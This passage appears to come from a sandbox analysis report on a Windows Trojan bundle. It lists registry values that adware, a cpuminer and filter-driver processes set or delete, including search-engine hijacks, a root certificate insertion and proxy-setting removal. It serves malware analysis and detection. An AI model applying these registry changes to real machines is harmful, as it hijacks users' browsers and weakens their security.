"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 43 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process powershell.exe:3772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"

The process powershell.exe:3656 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"

The process powershell.exe:3376 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe:3564 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe:3480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "EA F1 08 62 9A 83 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "8A 92 33 64 9A 83 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKCU\Software\InstallPath\Status]
"cpuminer" = "S"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 47 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files% (x86)\Google\Update\1.3.25.11, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\nsProcess.dll, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\registry.dll,"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\InternetTurbo]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process XTab_Setup2253.exe:1748 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\HELPDIR]
"(Default)" = "%Program Files% (x86)\XTab"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}" = "1"

[HKLM\SOFTWARE\Wow6432Node\supTab]
"ptid" = "pcm"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"TopResultURL" = "http://www.bing.com/search?q={searchTerms}&src=IE-TopResult&FORM=IETR02"
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4B 00 00 00 09 00 00 00 00 00 00 00"

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0]
"(Default)" = "SupTabLib"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURL" = "http://www.bing.com/favicon.ico"

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\0\win32]
"(Default)" = "%Program Files% (x86)\XTab\SupTab.dll"

[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}]
"(Default)" = "IETabPage Class"

[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"

[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"(Default)" = "%Program Files% (x86)\XTab\SupTab.dll"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}]
"(Default)" = "IIETabPage"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Ext\PreApproved]
"{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}" = ""

[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"Version" = "1.0"

[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\Version]
"(Default)" = "1.0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"
"DisplayName" = "Bing"

[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"FaviconURL" = "http://www.google.com/favicon.ico"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}"

[HKLM\SOFTWARE\Wow6432Node\SupDp]
"dir" = "%Program Files% (x86)\XTab"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconURL" = "http://do-search.com//favicon.ico"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}]
"(Default)" = "IIETabPage"

[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}.ico"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"TopResultURL" = "http://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"TopResultURL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY]
"CheckedValue" = "PMIL"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURLFallback" = "http://www.bing.com/favicon.ico"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"DisplayName" = "Google"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"DisplayName" = "e"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY]
"DefaultValue" = "PMIL"

[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{E733165D-CBCF-4FDA-883E-ADEF965B476C}.ico"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"AutoDetect"

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe:3400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "EA F1 08 62 9A 83 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "1D EF BE 63 9A 83 D0 01"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files% (x86)\Google\Update\1.3.25.11, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 46 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process amisid.exe:3516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\InternetTurbo]
"UID" = "915A4028688142931B5DDA64A4540CAD"

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe:4024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\GOSafer]
"QuietUninstallString" = "%Program Files% (x86)\GOSafer\uninst.exe"
"Comments" = "Your custom offers and deals!(xBLWr3p4Aq2S5TKPAPwXoUXvWB)"

[HKLM\SOFTWARE\GOSafer]
"Version" = "1.0.0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\GOSafer]
"DisplayVersion" = "1.0"
"Publisher" = "GO SAFER LLC"
"UninstallString" = "%Program Files% (x86)\GOSafer\uninst.exe"
"DisplayName" = "GOSafer"

The process nfregdrv.exe:3076 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0B 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

The process nfregdrv.exe:1648 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0A 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

The process CashReminder.exe:1108 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 04 00 00 00 09 00 00 00 00 00 00 00"
"DefaultConnectionSettings" = "46 00 00 00 04 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "1E 4E AA 68 9A 83 D0 01"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"

[HKLM\System\CurrentControlSet\Services\crfilterdrv]
"Tag" = "15"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0E 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\CashReminder]
"instid" = "Oe7hZG4iL2THGzzgTyPL5m0uORXCQUea"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "1E 4E AA 68 9A 83 D0 01"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe:1520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\CashReminder]
"Version" = "1.0.0"
"affid" = ""

[HKLM\System\CurrentControlSet\Services\CashReminder]
"Description" = "CashReminder will remind you when you can earn a percent of your money back shopping online and related products with lower prices!"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"DisplayName" = "CashReminder"
"Publisher" = "Related Deals LLC"
"UninstallString" = "%Program Files% (x86)\CashReminder\uninstall.exe /S"
"Comments" = "CashReminder will remind you when you can earn a percent of your money back shopping online and related products with lower prices! (Build: EZbBN9f90YpDduoIMPstB7W)"

[HKLM\SOFTWARE\Wow6432Node\CashReminder]
"Version" = "1.0.0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"DisplayVersion" = "1.0.0"
"QuietUninstallString" = "%Program Files% (x86)\CashReminder\uninstall.exe /S"

The process ActSys.exe:3756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 07 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "22 FE 3B 6A 9A 83 D0 01"

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\System\CurrentControlSet\Services\asfilterdrv]
"Tag" = "19"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\527254500A2C2998BD4D09D9989A7F3E76405E07]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 52 72 54 50"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "12 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionTime" = "BE 7F E7 6B 9A 83 D0 01"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 06 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\ActSys]
"instid" = "RB2FatLSVuE3rC0Sz2xcEzbzGA6K2yY0"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates]
"527254500A2C2998BD4D09D9989A7F3E76405E07"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"

